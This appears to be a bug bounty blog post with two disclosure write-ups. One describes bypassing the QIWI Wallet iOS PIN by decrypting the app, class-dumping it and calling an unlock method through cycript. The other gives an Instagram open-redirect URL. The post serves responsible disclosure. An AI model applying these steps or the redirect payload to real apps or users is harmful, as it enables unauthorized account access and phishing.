How I Was Able To Bypass The Security Code of QIWI Wallet? #iOS #Runtime

Another day, Another Blog!

So, sometime during the year 2014, I received a private bounty from ‘QIWI’. In which, I was able to bypass the security passcode of QIWI wallet allowing me to log into a user’s QIWI wallet and payments section. (Reversing + Runtime Analysis)

Runtime Analysis?

Runtime analysis involves reversing and analyzing the application work flow to bypass security locks, performing authentication bypass attacks, access sensitive information from memory, breaking logical checks and accessing restricted areas of the application.

QIWI?

QIWI – is a convenient way to pay for everyday services.

You can make payments in favor of the companies – operators of the various services of mobile communication and utility services. The QIWI payment service offers a payment method which each user find convenient and instant.
What was in scope?
Well, pretty much everything!
This includes their Web/Android/iOS applications.

As I was already late for the program, I quickly jumped onto iOS which is my favorite thing to work on.

After registering and logging into the application, the application prompted me to set a PIN code for the application, which basically works as the authentication mechanism for the application. The PIN itself is used for logging a user into the application instead of requesting for a password and going through the whole server-side process.

Once the security code is set, the app prompts for the security code whenever a user launches the application, as shown below:

FIG-1

I immediately knew that the application was calling some specific interface, during the runtime launch of the application. Time to find it 😈

Note: By default, almost all the applications on apple app store are encrypted to stop hackers and crackers from reversing and cracking the applications.

Step – 1: Reversing the Binary

I used ‘clutch‘ to crack the application’s binary and ‘class-dump‘ to obtain the class information for the same. Reversing a binary provides an insight into what’s exactly going on inside an application.

Step – 2: Hooking Onto the Application

After obtaining the class dump of the binary, I had to know which view controller instance was being called? So I hooked onto the QIWI Wallet process using ‘cycript‘ to obtain the view controller instance of the current displaying screen.

FIG-2

&

FIG-5-2

Step -3: The Bypass

Searching in the class dump for ‘IPhoneAppDelegate’ interface, revealed that ‘IPhoneAppDelegate’ Inherits ‘_ABAddressBookCopyArrayOfAllPeople’.

FIG-3-2

In iOS, methods of a parent class (IPhoneAppDelegate) can be invoked from a child class (_ABAddressBookCopyArrayOfAllPeople).

Exploring the child class i.e. (_ABAddressBookCopyArrayOfAllPeople) revealed an interesting method called ‘authenticationDataSourceDidUnlock’.

FIG-4

😕 Wonder what it does?

Invoking the ‘authenticationDataSourceDidUnlock’ method directly from the ‘cycript‘ prompt, logged me into the application without the need of a security code.

POC:

ubw6s9

Submitted          : Nov 14, 2014
Acknowledged  : Dec 5, 2014
Bounty                 : 😉

URL Redirection Vulnerability on Instagram !

Hey guys,

I think its high time I document all my findings, starting with instagram!

Instagram is an online mobile photo-sharing, video-sharing and social networking service that enables its users to take pictures and videos, and share them on a variety of social networking platforms, such as Facebook, Twitter, tumbler and Flickr.

In the mid of May 2014, I came across a URL redirection vulnerability on Instagram, which basically redirects any logged in user to another malicious domain 😉

Redirection URL:

http://instagram.com/integrity/checkpoint/?next=http://google.com#

POC:

Redirection

Submitted : May 11, 2014
Fixed On   : May 23, 2014
Bounty      : Yes